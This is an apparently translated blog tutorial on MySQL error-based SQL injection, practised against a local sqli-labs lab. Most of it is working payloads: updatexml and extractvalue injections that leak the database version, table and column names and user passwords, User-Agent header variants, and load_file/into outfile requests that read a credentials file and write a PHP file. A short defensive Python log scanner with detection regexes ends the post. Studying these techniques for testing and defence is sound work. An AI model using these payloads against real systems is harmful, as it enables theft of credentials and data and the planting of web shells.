SQL injection: error-based injection

Commonly used simple test statements and comment symbols


The comment symbol is the key to an SQL injection statement. The commonly used ones are # and --.


1. # and -- (followed by a space) are comment markers: everything after them is not executed. In a URL, for a GET request (the URL typed into the browser address bar), the browser treats # as the start of the fragment, which guides the browser's own behaviour and is never sent to the server. So the HTTP request does not include #, closing the statement with # does not comment anything out, and an error is reported. With -- (followed by a space), the trailing space is dropped in transmission, which also makes the comment fail. GET parameter injection therefore closes the statement with --+, because + is decoded as a space.
2. --%20 also works without error, since %20 is the URL-encoded space; likewise, writing # as %23 does not report an error.
3. For a POST request, # can be used directly to close the statement. The common case is form injection, for example injecting into a back-end login box.
4. Why must there be a space after -- but not after #? A -- comment needs the space to form a valid SQL statement, whereas # works with or without a following space. Without the space, -- runs straight into the single quote that the application appends, the result is treated as a single token, and the appended quote is not commented out.

Simple test statements:

xx' or 1=1 --+     if one condition is true the whole is true; the effect is to query all rows in the table
xx' and 1=2 --+    if one condition is false the whole is false
xx' and 1=1 --+    both conditions must be true for the whole to be true
union select ...   union query

Error injection

updatexml(): an XPath function in MySQL for querying and modifying XML document data.
extractvalue(): also an XPath function in MySQL, used to query XML document data.
floor(): the MySQL function for rounding down.

UPDATEXML(XML_document, XPath_string, new_value);
https://pythonjishu.com/mysql-updatexml

MySQL's UPDATEXML() function modifies XML data; it can update one or more node values in an XML document.

This function has three parameters:

  • XML data
  • XPath expression: used to specify the node position to be modified
  • new node value: the value used to replace the current node

Following is the syntax of the UPDATEXML() function:

UPDATEXML(xml_target, xpath_expr, new_val)

Specific usage:

xx' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)# (get the database version)

xx' and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)# (get the current user)

xx' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)# (get the database name)

k' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='mysql' limit 0,1)),0)# (error injection, get a table name)

k' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0)# (error injection, get a field name)

k' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)# (error injection, get a field value)

Common HTTP header injection

UA header injection

Inject into the User-Agent field of the HTTP request header.

Referer injection

Referer: when you visit a website, the browser tells the server where the request came from (the URL was typed directly, or a link on another page was clicked).

Cookie injection

A cookie is a string of characters: it is the browser's way of storing data returned by the server, and it usually holds user identity information. It is data (usually encrypted) that a website stores on the user's local machine in order to identify the user and track the session; the client stores it temporarily or permanently.

Session: when a web page on the server is accessed, the server allocates a block of memory called a session and associates it with the browser. "Browser" here means the browser window or a sub-window of it: only the browser that owns the session can access it, and even a newly launched browser on the same machine cannot. If another browser also needs to record state, it opens its own session. This is also known as session control.

Example of User-Agent injection:

Get the current database name

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,database())),'','')#

Get all table names (the literal '数据库名' below is a placeholder for the target database name)

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='数据库名'))),'','')#

The maximum length of the error message displayed by extractvalue() is 32 characters. If the message exceeds that length, the output is truncated, so it is sometimes necessary to use limit to display the result in pieces. The payload above becomes:

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))),'','')#
// Display the name of the first table in the security library

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 1,1))),'','')#
// Display the name of the second table in the security library

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 2,1))),'','')#
// Display the name of the third table in the security library

Get all field names

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))),'','')#

If the length is limited, limit pagination can be used:

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))),'','')#
// Display the name of the first field in the users table

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1))),'','')#
// Display the name of the second field in the users table

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1))),'','')#
// Display the name of the third field in the users table
...

Display field values

User-Agent: Mozilla/5.0......Firefox/46.0' and extractvalue(1,concat(0x7e,(select concat_ws(',',id,username,password) from security.users limit 0,1))),'','')#

File read and write operations

load_file(): read function
into outfile or into dumpfile: export (write) function

Common ways of obtaining the file path: error messages, leftover files, bug reports, platform configuration files, brute-forcing, etc.

http://127.0.0.1:8888/Less-2/?id=-1%20union%20select%201,load_file(%27D:\\Software\\PhpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\sql-connections\\db-creds.inc%27),3 (read a local file)

http://127.0.0.1:8888/Less-2/?id=-1%20union%20select%201,%20%27x%27%20,3%20into%20outfile%20%27D:\\x.php%27%20--+ (write a local file)
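From the defender's side, the comment-closer rules (--+, --%20, %23), the updatexml()/extractvalue() payloads carried in GET parameters and in the User-Agent/Referer headers, and the load_file()/into outfile patterns above all leave recognisable traces in request logs. The following is an added example, not code from the original post, that decodes each request value the way the server will see it and runs a small signature set over it; the sample requests are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests: one benign request, then one for each vector
# the post walks through (GET comment closer, encoded updatexml, User-Agent
# extractvalue with information_schema, and a union select with load_file).
SAMPLE_REQUESTS = [
    {"query": "id=1", "User-Agent": "Mozilla/5.0 Firefox/46.0",
     "Referer": "http://example.test/list#top"},
    {"query": "id=1'+or+1=1+--+", "User-Agent": "Mozilla/5.0 Firefox/46.0"},
    {"query": "id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user())),1)%23"},
    {"query": "id=1", "User-Agent": "Mozilla/5.0 Firefox/46.0' and extractvalue(1,"
     "concat(0x7e,(select group_concat(table_name) from information_schema.tables "
     "where table_schema=database()))),'','')#"},
    {"query": "id=-1%20union%20select%201,load_file(%27/tmp/notes.txt%27),3"},
]

# Each signature is applied to the decoded value, so --+, --%20 and %23 are
# all seen as the "-- " / "#" closers the post describes.
SIGNATURES = [
    ("error-based xpath function", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("information_schema enumeration", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("file read/write", re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)),
    ("quote then comment closer", re.compile(r"'[^']*?(?:--\s|--$|#)", re.S)),
    ("tautology", re.compile(r"\b(?:or|and)\s+1\s*=\s*[12]\b", re.I)),
]


def normalize(value: str) -> str:
    """Decode a raw query or header value as the server will: %xx -> char, + -> space."""
    return unquote_plus(value)


def scan_request(req: dict) -> list:
    """Return (field, signature name) pairs for every value that matches a signature."""
    findings = []
    for field, raw in req.items():
        text = normalize(raw)
        for name, pattern in SIGNATURES:
            if pattern.search(text):
                findings.append((field, name))
    return findings


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, scan_request(req))
```

The decode step matters: the same --+ that defeats a naive "--" string match in the raw URL is a plain "-- " after decoding, and the header fields must be scanned too, since nothing in the query string hints at a User-Agent payload.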

Origin blog.csdn.net/bbq1234564/article/details/132236974